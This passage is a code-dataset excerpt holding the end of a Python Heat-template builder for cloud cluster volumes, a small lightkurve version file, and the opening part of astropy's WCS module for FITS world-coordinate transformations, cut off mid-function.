properties = {
"name": volume_name,
"size": six.text_type(ng.volumes_size)
}
if ng.volume_type:
properties["volume_type"] = ng.volume_type
if ng.volumes_availability_zone:
properties["availability_zone"] = ng.volumes_availability_zone
if ng.volume_local_to_instance:
properties["scheduler_hints"] = {
"local_to_instance": {"get_param": "instance"}}
return yaml.safe_dump({
"heat_template_version": heat_common.HEAT_TEMPLATE_VERSION,
"description": self._volume_for_node_group_description(ng),
"parameters": {
"volume_index": {
"type": "string"
},
"instance_index": {
"type": "string"
},
"instance": {
"type": "string"
}},
"resources": {
"volume": {
"type": "OS::Cinder::Volume",
"properties": properties
},
"volume-attachment": {
"type": "OS::Cinder::VolumeAttachment",
"properties": {
"instance_uuid": {"get_param": "instance"},
"volume_id": {"get_resource": "volume"},
}
}},
"outputs": {}
})
def _get_security_groups(self, node_group):
node_group_sg = list(node_group.security_groups or [])
if node_group.auto_security_group:
node_group_sg += [
{"get_param": AUTO_SECURITY_GROUP_PARAM_NAME}
]
return node_group_sg
def _serialize_aa_server_group(self, server_group_index):
server_group_name = _get_aa_group_name(self.cluster,
server_group_index)
return {
server_group_name: {
"type": "OS::Nova::ServerGroup",
"properties": {
"name": server_group_name,
"policies": ["anti-affinity"]
}
}
}
def get_node_group_instances(self, node_group):
cluster = node_group.cluster
outputs = h.get_stack_outputs(cluster)
for output in outputs:
if output['output_key'] == node_group.name + "-instances":
return output["output_value"]
return []
| 34.625373
| 79
| 0.550756
|
6eeda0464e647c9d2c640d0ed269b8f90e22a801
| 157
|
py
|
Python
|
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
lightkurve/version.py
|
jsk389/lightkurve
|
2fe031708f4c241b61796ccdacf658717b2ffa44
|
[
"MIT"
] | null | null | null |
# It is important to store the version number in a separate file
# so that we can read it from setup.py without importing the package
__version__ = "1.0b13"
| 39.25
| 68
| 0.770701
|
88f7b29530acaa88545a7043d699d0e21344494e
| 127,618
|
py
|
Python
|
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
astropy/wcs/wcs.py
|
mehrdad-shokri/astropy
|
abd73b51277694338c8eca7639da956dcd06f207
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# Under the hood, there are 3 separate classes that perform different
# parts of the transformation:
#
# - `~astropy.wcs.Wcsprm`: Is a direct wrapper of the core WCS
# functionality in `wcslib`_. (This includes TPV and TPD
# polynomial distortion, but not SIP distortion).
#
# - `~astropy.wcs.Sip`: Handles polynomial distortion as defined in the
# `SIP`_ convention.
#
# - `~astropy.wcs.DistortionLookupTable`: Handles `distortion paper`_
# lookup tables.
#
# Additionally, the class `WCS` aggregates all of these transformations
# together in a pipeline:
#
# - Detector to image plane correction (by a pair of
# `~astropy.wcs.DistortionLookupTable` objects).
#
# - `SIP`_ distortion correction (by an underlying `~astropy.wcs.Sip`
# object)
#
# - `distortion paper`_ table-lookup correction (by a pair of
# `~astropy.wcs.DistortionLookupTable` objects).
#
# - `wcslib`_ WCS transformation (by a `~astropy.wcs.Wcsprm` object)
# STDLIB
import copy
import uuid
import io
import itertools
import os
import re
import textwrap
import warnings
import builtins
# THIRD-PARTY
import numpy as np
# LOCAL
from astropy import log
from astropy.io import fits
from . import docstrings
from . import _wcs
from astropy.utils.compat import possible_filename
from astropy.utils.exceptions import AstropyWarning, AstropyUserWarning, AstropyDeprecationWarning
# Mix-in class that provides the APE 14 API
from .wcsapi.fitswcs import FITSWCSAPIMixin, SlicedFITSWCS
__all__ = ['FITSFixedWarning', 'WCS', 'find_all_wcs',
'DistortionLookupTable', 'Sip', 'Tabprm', 'Wcsprm', 'Auxprm',
'Wtbarr', 'WCSBase', 'validate', 'WcsError', 'SingularMatrixError',
'InconsistentAxisTypesError', 'InvalidTransformError',
'InvalidCoordinateError', 'NoSolutionError',
'InvalidSubimageSpecificationError', 'NoConvergence',
'NonseparableSubimageCoordinateSystemError',
'NoWcsKeywordsFoundError', 'InvalidTabularParametersError']
__doctest_skip__ = ['WCS.all_world2pix']
if _wcs is not None:
_parsed_version = _wcs.__version__.split('.')
if int(_parsed_version[0]) == 5 and int(_parsed_version[1]) < 8:
        raise ImportError(
            "astropy.wcs is built with wcslib {0}, but only versions 5.8 and "
            "later on the 5.x series are known to work. The version of wcslib "
            "that ships with astropy may be used.".format(_wcs.__version__))
if not _wcs._sanity_check():
raise RuntimeError(
"astropy.wcs did not pass its sanity check for your build "
"on your platform.")
WCSBase = _wcs._Wcs
DistortionLookupTable = _wcs.DistortionLookupTable
Sip = _wcs.Sip
Wcsprm = _wcs.Wcsprm
Auxprm = _wcs.Auxprm
Tabprm = _wcs.Tabprm
Wtbarr = _wcs.Wtbarr
WcsError = _wcs.WcsError
SingularMatrixError = _wcs.SingularMatrixError
InconsistentAxisTypesError = _wcs.InconsistentAxisTypesError
InvalidTransformError = _wcs.InvalidTransformError
InvalidCoordinateError = _wcs.InvalidCoordinateError
NoSolutionError = _wcs.NoSolutionError
InvalidSubimageSpecificationError = _wcs.InvalidSubimageSpecificationError
NonseparableSubimageCoordinateSystemError = _wcs.NonseparableSubimageCoordinateSystemError
NoWcsKeywordsFoundError = _wcs.NoWcsKeywordsFoundError
InvalidTabularParametersError = _wcs.InvalidTabularParametersError
# Copy all the constants from the C extension into this module's namespace
for key, val in _wcs.__dict__.items():
if key.startswith(('WCSSUB', 'WCSHDR', 'WCSHDO')):
locals()[key] = val
__all__.append(key)
# Set coordinate extraction callback for WCS -TAB:
def _load_tab_bintable(hdulist, extnam, extver, extlev, kind, ttype, row, ndim):
arr = hdulist[(extnam, extver)].data[ttype][row - 1]
if arr.ndim != ndim:
if kind == 'c' and ndim == 2:
arr = arr.reshape((arr.size, 1))
else:
raise ValueError("Bad TDIM")
return np.ascontiguousarray(arr, dtype=np.double)
_wcs.set_wtbarr_fitsio_callback(_load_tab_bintable)
else:
WCSBase = object
Wcsprm = object
DistortionLookupTable = object
Sip = object
Tabprm = object
Wtbarr = object
WcsError = None
SingularMatrixError = None
InconsistentAxisTypesError = None
InvalidTransformError = None
InvalidCoordinateError = None
NoSolutionError = None
InvalidSubimageSpecificationError = None
NonseparableSubimageCoordinateSystemError = None
NoWcsKeywordsFoundError = None
InvalidTabularParametersError = None
# Additional relax bit flags
WCSHDO_SIP = 0x80000
# Regular expression defining SIP keywords. It matches keywords that start with A
# or B, optionally followed by P, followed by an underscore, then a number in the
# range 0-19, another underscore, and another number in the range 0-19. The
# keyword may optionally end with a capital letter.
SIP_KW = re.compile('''^[AB]P?_1?[0-9]_1?[0-9][A-Z]?$''')
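# For example, SIP_KW matches 'A_0_2', 'B_1_1', 'AP_13_5' and 'A_0_2Z', but not
# 'C_0_0' or 'A_20_0'.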
def _parse_keysel(keysel):
keysel_flags = 0
if keysel is not None:
for element in keysel:
if element.lower() == 'image':
keysel_flags |= _wcs.WCSHDR_IMGHEAD
elif element.lower() == 'binary':
keysel_flags |= _wcs.WCSHDR_BIMGARR
elif element.lower() == 'pixel':
keysel_flags |= _wcs.WCSHDR_PIXLIST
else:
raise ValueError(
"keysel must be a list of 'image', 'binary' " +
"and/or 'pixel'")
else:
keysel_flags = -1
return keysel_flags
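# Note on _parse_keysel above: for example, _parse_keysel(['image', 'pixel'])
# returns _wcs.WCSHDR_IMGHEAD | _wcs.WCSHDR_PIXLIST, and _parse_keysel(None)
# returns -1.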
class NoConvergence(Exception):
"""
An error class used to report non-convergence and/or divergence
of numerical methods. It is used to report errors in the
iterative solution used by
the :py:meth:`~astropy.wcs.WCS.all_world2pix`.
Attributes
----------
best_solution : `numpy.ndarray`
Best solution achieved by the numerical method.
accuracy : `numpy.ndarray`
Accuracy of the ``best_solution``.
niter : `int`
Number of iterations performed by the numerical method
to compute ``best_solution``.
divergent : None, `numpy.ndarray`
Indices of the points in ``best_solution`` array
for which the solution appears to be divergent. If the
solution does not diverge, ``divergent`` will be set to `None`.
slow_conv : None, `numpy.ndarray`
Indices of the solutions in ``best_solution`` array
for which the solution failed to converge within the
specified maximum number of iterations. If there are no
non-converging solutions (i.e., if the required accuracy
has been achieved for all input data points)
then ``slow_conv`` will be set to `None`.
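
Examples
--------
A minimal sketch of how this exception is typically handled (not a
doctest; assumes ``w`` is an existing `~astropy.wcs.WCS` object and
``world`` is an ``Nx2`` array of world coordinates)::

    try:
        pix = w.all_world2pix(world, 1)
    except NoConvergence as e:
        pix = e.best_solution
        print("accuracy reached:", e.accuracy)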
"""
def __init__(self, *args, best_solution=None, accuracy=None, niter=None,
divergent=None, slow_conv=None, **kwargs):
super().__init__(*args)
self.best_solution = best_solution
self.accuracy = accuracy
self.niter = niter
self.divergent = divergent
self.slow_conv = slow_conv
if kwargs:
warnings.warn("Function received unexpected arguments ({}) these "
"are ignored but will raise an Exception in the "
"future.".format(list(kwargs)),
AstropyDeprecationWarning)
class FITSFixedWarning(AstropyWarning):
"""
The warning raised when the contents of the FITS header have been
modified to be standards compliant.
"""
pass
class WCS(FITSWCSAPIMixin, WCSBase):
"""WCS objects perform standard WCS transformations, and correct for
`SIP`_ and `distortion paper`_ table-lookup transformations, based
on the WCS keywords and supplementary data read from a FITS file.
See also: http://docs.astropy.org/en/stable/wcs/
Parameters
----------
header : astropy.io.fits header object, Primary HDU, Image HDU, string, dict-like, or None, optional
If *header* is not provided or None, the object will be
initialized to default values.
fobj : An astropy.io.fits file (hdulist) object, optional
It is needed when header keywords point to a `distortion
paper`_ lookup table stored in a different extension.
key : str, optional
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the
``\"a\"`` part of the ``CTYPEia`` cards. *key* may only be
provided if *header* is also provided.
minerr : float, optional
The minimum value a distortion correction must have in order
to be applied. If the value of ``CQERRja`` is smaller than
*minerr*, the corresponding distortion is not applied.
relax : bool or int, optional
Degree of permissiveness:
- `True` (default): Admit all recognized informal extensions
of the WCS standard.
- `False`: Recognize only FITS keywords defined by the
published WCS standard.
- `int`: a bit field selecting specific extensions to accept.
See :ref:`relaxread` for details.
naxis : int or sequence, optional
Extracts specific coordinate axes using
:meth:`~astropy.wcs.Wcsprm.sub`. If a header is provided, and
*naxis* is not ``None``, *naxis* will be passed to
:meth:`~astropy.wcs.Wcsprm.sub` in order to select specific
axes from the header. See :meth:`~astropy.wcs.Wcsprm.sub` for
more details about this parameter.
keysel : sequence of flags, optional
A sequence of flags used to select the keyword types
considered by wcslib. When ``None``, only the standard image
header keywords are considered (and the underlying wcspih() C
function is called). To use binary table image array or pixel
list keywords, *keysel* must be set.
Each element in the list should be one of the following
strings:
- 'image': Image header keywords
- 'binary': Binary table image array keywords
- 'pixel': Pixel list keywords
Keywords such as ``EQUIna`` or ``RFRQna`` that are common to
binary table image arrays and pixel lists (including
``WCSNna`` and ``TWCSna``) are selected by both 'binary' and
'pixel'.
colsel : sequence of int, optional
A sequence of table column numbers used to restrict the WCS
transformations considered to only those pertaining to the
specified columns. If `None`, there is no restriction.
fix : bool, optional
When `True` (default), call `~astropy.wcs.Wcsprm.fix` on
the resulting object to fix any non-standard uses in the
header. `FITSFixedWarning` Warnings will be emitted if any
changes were made.
translate_units : str, optional
Specify which potentially unsafe translations of non-standard
unit strings to perform. By default, performs none. See
`WCS.fix` for more information about this parameter. Only
effective when ``fix`` is `True`.
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid key.
KeyError
Key not found in FITS header.
ValueError
Lookup table distortion present in the header but *fobj* was
not provided.
Notes
-----
1. astropy.wcs supports arbitrary *n* dimensions for the core WCS
(the transformations handled by WCSLIB). However, the
`distortion paper`_ lookup table and `SIP`_ distortions must be
two dimensional. Therefore, if you try to create a WCS object
where the core WCS has a different number of dimensions than 2
and that object also contains a `distortion paper`_ lookup
table or `SIP`_ distortion, a `ValueError`
exception will be raised. To avoid this, consider using the
*naxis* kwarg to select two dimensions from the core WCS.
2. The number of coordinate axes in the transformation is not
determined directly from the ``NAXIS`` keyword but instead from
the highest of:
- ``NAXIS`` keyword
- ``WCSAXESa`` keyword
- The highest axis number in any parameterized WCS keyword.
The keyword value, as well as the keyword itself, must be
syntactically valid, otherwise it will not be considered.
If none of these keyword types is present, i.e. if the header
only contains auxiliary WCS keywords for a particular
coordinate representation, then no coordinate description is
constructed for it.
The number of axes, which is set as the ``naxis`` member, may
differ for different coordinate representations of the same
image.
3. When the header includes duplicate keywords, in most cases the
last encountered is used.
4. `~astropy.wcs.Wcsprm.set` is called immediately after
construction, so any invalid keywords or transformations will
be raised by the constructor, not when subsequently calling a
transformation method.
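
Examples
--------
A minimal construction sketch (not a doctest; ``'image.fits'`` is a
placeholder for a FITS file with a two-dimensional celestial WCS in its
primary header)::

    from astropy.io import fits
    from astropy.wcs import WCS

    with fits.open('image.fits') as hdulist:
        w = WCS(hdulist[0].header, hdulist)
    ra, dec = w.all_pix2world([10.0], [20.0], 0)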
"""
def __init__(self, header=None, fobj=None, key=' ', minerr=0.0,
relax=True, naxis=None, keysel=None, colsel=None,
fix=True, translate_units='', _do_set=True):
close_fds = []
if header is None:
if naxis is None:
naxis = 2
wcsprm = _wcs.Wcsprm(header=None, key=key,
relax=relax, naxis=naxis)
self.naxis = wcsprm.naxis
# Set some reasonable defaults.
det2im = (None, None)
cpdis = (None, None)
sip = None
else:
keysel_flags = _parse_keysel(keysel)
if isinstance(header, (str, bytes)):
try:
is_path = (possible_filename(header) and
os.path.exists(header))
except (OSError, ValueError):
is_path = False
if is_path:
if fobj is not None:
raise ValueError(
"Can not provide both a FITS filename to "
"argument 1 and a FITS file object to argument 2")
fobj = fits.open(header)
close_fds.append(fobj)
header = fobj[0].header
elif isinstance(header, fits.hdu.image._ImageBaseHDU):
header = header.header
elif not isinstance(header, fits.Header):
try:
# Accept any dict-like object
orig_header = header
header = fits.Header()
for dict_key in orig_header.keys():
header[dict_key] = orig_header[dict_key]
except TypeError:
raise TypeError(
"header must be a string, an astropy.io.fits.Header "
"object, or a dict-like object")
if isinstance(header, fits.Header):
header_string = header.tostring().rstrip()
else:
header_string = header
# Importantly, header is a *copy* of the passed-in header
# because we will be modifying it
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
header_string = header_string
else:
header_bytes = header_string
header_string = header_string.decode('ascii')
if not (fobj is None or isinstance(fobj, fits.HDUList)):
raise AssertionError("'fobj' must be either None or an "
"astropy.io.fits.HDUList object.")
est_naxis = 2
try:
tmp_header = fits.Header.fromstring(header_string)
self._remove_sip_kw(tmp_header)
tmp_header_bytes = tmp_header.tostring().rstrip()
if isinstance(tmp_header_bytes, str):
tmp_header_bytes = tmp_header_bytes.encode('ascii')
tmp_wcsprm = _wcs.Wcsprm(header=tmp_header_bytes, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, warnings=False,
hdulist=fobj)
if naxis is not None:
try:
tmp_wcsprm = tmp_wcsprm.sub(naxis)
except ValueError:
pass
est_naxis = tmp_wcsprm.naxis if tmp_wcsprm.naxis else 2
except _wcs.NoWcsKeywordsFoundError:
pass
self.naxis = est_naxis
header = fits.Header.fromstring(header_string)
det2im = self._read_det2im_kw(header, fobj, err=minerr)
cpdis = self._read_distortion_kw(
header, fobj, dist='CPDIS', err=minerr)
sip = self._read_sip_kw(header, wcskey=key)
self._remove_sip_kw(header)
header_string = header.tostring()
header_string = header_string.replace('END' + ' ' * 77, '')
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
header_string = header_string
else:
header_bytes = header_string
header_string = header_string.decode('ascii')
try:
wcsprm = _wcs.Wcsprm(header=header_bytes, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, hdulist=fobj)
except _wcs.NoWcsKeywordsFoundError:
# The header may have SIP or distortions, but no core
# WCS. That isn't an error -- we want a "default"
# (identity) core Wcs transformation in that case.
if colsel is None:
wcsprm = _wcs.Wcsprm(header=None, key=key,
relax=relax, keysel=keysel_flags,
colsel=colsel, hdulist=fobj)
else:
raise
if naxis is not None:
wcsprm = wcsprm.sub(naxis)
self.naxis = wcsprm.naxis
if (wcsprm.naxis != 2 and
(det2im[0] or det2im[1] or cpdis[0] or cpdis[1] or sip)):
raise ValueError(
"""
FITS WCS distortion paper lookup tables and SIP distortions only work
in 2 dimensions. However, WCSLIB has detected {} dimensions in the
core WCS keywords. To use core WCS in conjunction with FITS WCS
distortion paper lookup tables or SIP distortion, you must select or
reduce these to 2 dimensions using the naxis kwarg.
""".format(wcsprm.naxis))
header_naxis = header.get('NAXIS', None)
if header_naxis is not None and header_naxis < wcsprm.naxis:
warnings.warn(
"The WCS transformation has more axes ({:d}) than the "
"image it is associated with ({:d})".format(
wcsprm.naxis, header_naxis), FITSFixedWarning)
self._get_naxis(header)
WCSBase.__init__(self, sip, cpdis, wcsprm, det2im)
if fix:
if header is None:
with warnings.catch_warnings():
warnings.simplefilter('ignore', FITSFixedWarning)
self.fix(translate_units=translate_units)
else:
self.fix(translate_units=translate_units)
if _do_set:
self.wcs.set()
for fd in close_fds:
fd.close()
self._pixel_bounds = None
def __copy__(self):
new_copy = self.__class__()
WCSBase.__init__(new_copy, self.sip,
(self.cpdis1, self.cpdis2),
self.wcs,
(self.det2im1, self.det2im2))
new_copy.__dict__.update(self.__dict__)
return new_copy
def __deepcopy__(self, memo):
from copy import deepcopy
new_copy = self.__class__()
new_copy.naxis = deepcopy(self.naxis, memo)
WCSBase.__init__(new_copy, deepcopy(self.sip, memo),
(deepcopy(self.cpdis1, memo),
deepcopy(self.cpdis2, memo)),
deepcopy(self.wcs, memo),
(deepcopy(self.det2im1, memo),
deepcopy(self.det2im2, memo)))
for key, val in self.__dict__.items():
new_copy.__dict__[key] = deepcopy(val, memo)
return new_copy
def copy(self):
"""
Return a shallow copy of the object.
Convenience method so the user doesn't have to import the
:mod:`copy` stdlib module.
.. warning::
Use `deepcopy` instead of `copy` unless you know why you need a
shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Return a deep copy of the object.
Convenience method so the user doesn't have to import the
:mod:`copy` stdlib module.
"""
return copy.deepcopy(self)
def sub(self, axes=None):
copy = self.deepcopy()
# We need to know which axes have been dropped, but there is no easy
# way to do this with the .sub function, so instead we assign UUIDs to
# the CNAME parameters in copy.wcs. We can later access the original
# CNAME properties from self.wcs.
cname_uuid = [str(uuid.uuid4()) for i in range(copy.wcs.naxis)]
copy.wcs.cname = cname_uuid
# Subset the WCS
copy.wcs = copy.wcs.sub(axes)
copy.naxis = copy.wcs.naxis
# Construct a list of dimensions from the original WCS in the order
# in which they appear in the final WCS.
keep = [cname_uuid.index(cname) if cname in cname_uuid else None for cname in copy.wcs.cname]
# Restore the original CNAMEs
copy.wcs.cname = ['' if i is None else self.wcs.cname[i] for i in keep]
# Subset pixel_shape and pixel_bounds
if self.pixel_shape:
copy.pixel_shape = tuple([None if i is None else self.pixel_shape[i] for i in keep])
if self.pixel_bounds:
copy.pixel_bounds = [None if i is None else self.pixel_bounds[i] for i in keep]
return copy
if _wcs is not None:
sub.__doc__ = _wcs.Wcsprm.sub.__doc__
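# Illustrative use of ``sub`` (assumes ``w`` is an existing WCS instance):
#   celestial = w.sub([1, 2])   # keep only the first two axes, e.g. RA/Dec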
def _fix_scamp(self):
"""
Remove SCAMP's PVi_m distortion parameters if SIP distortion parameters
are also present. Some projects (e.g., Palomar Transient Factory)
convert SCAMP's distortion parameters (which abuse the PVi_m cards) to
SIP. However, wcslib gets confused by the presence of both SCAMP and
SIP distortion parameters.
See https://github.com/astropy/astropy/issues/299.
"""
# Nothing to be done if no WCS attached
if self.wcs is None:
return
# Nothing to be done if no PV parameters attached
pv = self.wcs.get_pv()
if not pv:
return
# Nothing to be done if axes don't use SIP distortion parameters
if self.sip is None:
return
# Nothing to be done if any radial terms are present...
# Loop over list to find any radial terms.
# Certain values of the `j' index are used for storing
# radial terms; refer to Equation (1) in
# <http://web.ipac.caltech.edu/staff/shupe/reprints/SIP_to_PV_SPIE2012.pdf>.
pv = np.asarray(pv)
# Loop over distinct values of `i' index
for i in set(pv[:, 0]):
# Get all values of `j' index for this value of `i' index
js = set(pv[:, 1][pv[:, 0] == i])
# Find max value of `j' index
max_j = max(js)
for j in (3, 11, 23, 39):
if j < max_j and j in js:
return
self.wcs.set_pv([])
warnings.warn("Removed redundant SCAMP distortion parameters " +
"because SIP parameters are also present", FITSFixedWarning)
def fix(self, translate_units='', naxis=None):
"""
Perform the fix operations from wcslib, and warn about any
changes it has made.
Parameters
----------
translate_units : str, optional
Specify which potentially unsafe translations of
non-standard unit strings to perform. By default,
performs none.
Although ``"S"`` is commonly used to represent seconds,
its translation to ``"s"`` is potentially unsafe since the
standard recognizes ``"S"`` formally as Siemens, however
rarely that may be used. The same applies to ``"H"`` for
hours (Henry), and ``"D"`` for days (Debye).
This string controls what to do in such cases, and is
case-insensitive.
- If the string contains ``"s"``, translate ``"S"`` to
``"s"``.
- If the string contains ``"h"``, translate ``"H"`` to
``"h"``.
- If the string contains ``"d"``, translate ``"D"`` to
``"d"``.
Thus ``''`` doesn't do any unsafe translations, whereas
``'shd'`` does all of them.
naxis : int array[naxis], optional
Image axis lengths. If this array is set to zero or
``None``, then `~astropy.wcs.Wcsprm.cylfix` will not be
invoked.
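
Examples
--------
A minimal sketch (not a doctest; assumes ``w`` is an existing `WCS`
instance)::

    w.fix()                       # apply wcslib fixes, no unit translation
    w.fix(translate_units='shd')  # additionally translate S->s, H->h, D->d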
"""
if self.wcs is not None:
self._fix_scamp()
fixes = self.wcs.fix(translate_units, naxis)
for key, val in fixes.items():
if val != "No change":
if (key == 'datfix' and '1858-11-17' in val and
not np.count_nonzero(self.wcs.mjdref)):
continue
warnings.warn(
("'{0}' made the change '{1}'.").
format(key, val),
FITSFixedWarning)
def calc_footprint(self, header=None, undistort=True, axes=None, center=True):
"""
Calculates the footprint of the image on the sky.
A footprint is defined as the positions of the corners of the
image on the sky after all available distortions have been
applied.
Parameters
----------
header : `~astropy.io.fits.Header` object, optional
Used to get ``NAXIS1`` and ``NAXIS2``
``header`` and ``axes`` are mutually exclusive ways of
providing the same information.
undistort : bool, optional
If `True`, take SIP and distortion lookup table into
account
axes : length 2 sequence ints, optional
If provided, use the given sequence as the shape of the
image. Otherwise, use the ``NAXIS1`` and ``NAXIS2``
keywords from the header that was used to create this
`WCS` object.
center : bool, optional
If `True` use the center of the pixel, otherwise use the corner.
Returns
-------
coord : (4, 2) array of (*x*, *y*) coordinates.
The order is clockwise starting with the bottom left corner.
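
Examples
--------
A minimal sketch (not a doctest; assumes ``w`` is a 2-D celestial `WCS`
whose ``pixel_shape`` is set, or that an explicit ``axes`` is given)::

    corners = w.calc_footprint()                   # uses w.pixel_shape
    corners = w.calc_footprint(axes=(1024, 2048))  # explicit image size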
"""
if axes is not None:
naxis1, naxis2 = axes
else:
if header is None:
try:
# classes that inherit from WCS and define naxis1/2
# do not require a header parameter
naxis1, naxis2 = self.pixel_shape
except (AttributeError, TypeError):
warnings.warn("Need a valid header in order to calculate footprint\n", AstropyUserWarning)
return None
else:
naxis1 = header.get('NAXIS1', None)
naxis2 = header.get('NAXIS2', None)
if naxis1 is None or naxis2 is None:
raise ValueError(
"Image size could not be determined.")
if center:
corners = np.array([[1, 1],
[1, naxis2],
[naxis1, naxis2],
[naxis1, 1]], dtype=np.float64)
else:
corners = np.array([[0.5, 0.5],
[0.5, naxis2 + 0.5],
[naxis1 + 0.5, naxis2 + 0.5],
[naxis1 + 0.5, 0.5]], dtype=np.float64)
if undistort:
return self.all_pix2world(corners, 1)
else:
return self.wcs_pix2world(corners, 1)
def _read_det2im_kw(self, header, fobj, err=0.0):
"""
Create a `distortion paper`_ type lookup table for detector to
image plane correction.
"""
if fobj is None:
return (None, None)
if not isinstance(fobj, fits.HDUList):
return (None, None)
try:
axiscorr = header['AXISCORR']
d2imdis = self._read_d2im_old_format(header, fobj, axiscorr)
return d2imdis
except KeyError:
pass
dist = 'D2IMDIS'
d_kw = 'D2IM'
err_kw = 'D2IMERR'
tables = {}
for i in range(1, self.naxis + 1):
d_error = header.get(err_kw + str(i), 0.0)
if d_error < err:
tables[i] = None
continue
distortion = dist + str(i)
if distortion in header:
dis = header[distortion].lower()
if dis == 'lookup':
del header[distortion]
assert isinstance(fobj, fits.HDUList), ('An astropy.io.fits.HDUList '
'is required for Lookup table distortion.')
dp = (d_kw + str(i)).strip()
dp_extver_key = dp + '.EXTVER'
if dp_extver_key in header:
d_extver = header[dp_extver_key]
del header[dp_extver_key]
else:
d_extver = 1
dp_axis_key = dp + f'.AXIS.{i:d}'
if i == header[dp_axis_key]:
d_data = fobj['D2IMARR', d_extver].data
else:
d_data = (fobj['D2IMARR', d_extver].data).transpose()
del header[dp_axis_key]
d_header = fobj['D2IMARR', d_extver].header
d_crpix = (d_header.get('CRPIX1', 0.0), d_header.get('CRPIX2', 0.0))
d_crval = (d_header.get('CRVAL1', 0.0), d_header.get('CRVAL2', 0.0))
d_cdelt = (d_header.get('CDELT1', 1.0), d_header.get('CDELT2', 1.0))
d_lookup = DistortionLookupTable(d_data, d_crpix,
d_crval, d_cdelt)
tables[i] = d_lookup
else:
warnings.warn('Polynomial distortion is not implemented.\n', AstropyUserWarning)
for key in set(header):
if key.startswith(dp + '.'):
del header[key]
else:
tables[i] = None
if not tables:
return (None, None)
else:
return (tables.get(1), tables.get(2))
def _read_d2im_old_format(self, header, fobj, axiscorr):
warnings.warn("The use of ``AXISCORR`` for D2IM correction has been deprecated."
"`~astropy.wcs` will read in files with ``AXISCORR`` but ``to_fits()`` will write "
"out files without it.",
AstropyDeprecationWarning)
cpdis = [None, None]
crpix = [0., 0.]
crval = [0., 0.]
cdelt = [1., 1.]
try:
d2im_data = fobj[('D2IMARR', 1)].data
except KeyError:
return (None, None)
except AttributeError:
return (None, None)
d2im_data = np.array([d2im_data])
d2im_hdr = fobj[('D2IMARR', 1)].header
naxis = d2im_hdr['NAXIS']
for i in range(1, naxis + 1):
crpix[i - 1] = d2im_hdr.get('CRPIX' + str(i), 0.0)
crval[i - 1] = d2im_hdr.get('CRVAL' + str(i), 0.0)
cdelt[i - 1] = d2im_hdr.get('CDELT' + str(i), 1.0)
cpdis = DistortionLookupTable(d2im_data, crpix, crval, cdelt)
if axiscorr == 1:
return (cpdis, None)
elif axiscorr == 2:
return (None, cpdis)
else:
warnings.warn("Expected AXISCORR to be 1 or 2", AstropyUserWarning)
return (None, None)
def _write_det2im(self, hdulist):
"""
Writes a `distortion paper`_ type lookup table to the given
`astropy.io.fits.HDUList`.
"""
if self.det2im1 is None and self.det2im2 is None:
return
dist = 'D2IMDIS'
d_kw = 'D2IM'
err_kw = 'D2IMERR'
def write_d2i(num, det2im):
if det2im is None:
return
hdulist[0].header[f'{dist}{num:d}'] = (
'LOOKUP', 'Detector to image correction type')
hdulist[0].header[f'{d_kw}{num:d}.EXTVER'] = (
num, 'Version number of WCSDVARR extension')
hdulist[0].header[f'{d_kw}{num:d}.NAXES'] = (
len(det2im.data.shape), 'Number of independent variables in D2IM function')
for i in range(det2im.data.ndim):
jth = {1: '1st', 2: '2nd', 3: '3rd'}.get(i + 1, f'{i + 1}th')
hdulist[0].header['{}{:d}.AXIS.{:d}'.format(d_kw, num, i + 1)] = (
i + 1, f'Axis number of the {jth} variable in a D2IM function')
image = fits.ImageHDU(det2im.data, name='D2IMARR')
header = image.header
header['CRPIX1'] = (det2im.crpix[0],
'Coordinate system reference pixel')
header['CRPIX2'] = (det2im.crpix[1],
'Coordinate system reference pixel')
header['CRVAL1'] = (det2im.crval[0],
'Coordinate system value at reference pixel')
header['CRVAL2'] = (det2im.crval[1],
'Coordinate system value at reference pixel')
header['CDELT1'] = (det2im.cdelt[0],
'Coordinate increment along axis')
header['CDELT2'] = (det2im.cdelt[1],
'Coordinate increment along axis')
image.ver = int(hdulist[0].header[f'{d_kw}{num:d}.EXTVER'])
hdulist.append(image)
write_d2i(1, self.det2im1)
write_d2i(2, self.det2im2)
def _read_distortion_kw(self, header, fobj, dist='CPDIS', err=0.0):
"""
Reads `distortion paper`_ table-lookup keywords and data, and
returns a 2-tuple of `~astropy.wcs.DistortionLookupTable`
objects.
If no `distortion paper`_ keywords are found, ``(None, None)``
is returned.
"""
if isinstance(header, (str, bytes)):
return (None, None)
if dist == 'CPDIS':
d_kw = 'DP'
err_kw = 'CPERR'
else:
d_kw = 'DQ'
err_kw = 'CQERR'
tables = {}
for i in range(1, self.naxis + 1):
d_error_key = err_kw + str(i)
if d_error_key in header:
d_error = header[d_error_key]
del header[d_error_key]
else:
d_error = 0.0
if d_error < err:
tables[i] = None
continue
distortion = dist + str(i)
if distortion in header:
dis = header[distortion].lower()
del header[distortion]
if dis == 'lookup':
if not isinstance(fobj, fits.HDUList):
raise ValueError('an astropy.io.fits.HDUList is '
'required for Lookup table distortion.')
dp = (d_kw + str(i)).strip()
dp_extver_key = dp + '.EXTVER'
if dp_extver_key in header:
d_extver = header[dp_extver_key]
del header[dp_extver_key]
else:
d_extver = 1
dp_axis_key = dp + f'.AXIS.{i:d}'
if i == header[dp_axis_key]:
d_data = fobj['WCSDVARR', d_extver].data
else:
d_data = (fobj['WCSDVARR', d_extver].data).transpose()
del header[dp_axis_key]
d_header = fobj['WCSDVARR', d_extver].header
d_crpix = (d_header.get('CRPIX1', 0.0),
d_header.get('CRPIX2', 0.0))
d_crval = (d_header.get('CRVAL1', 0.0),
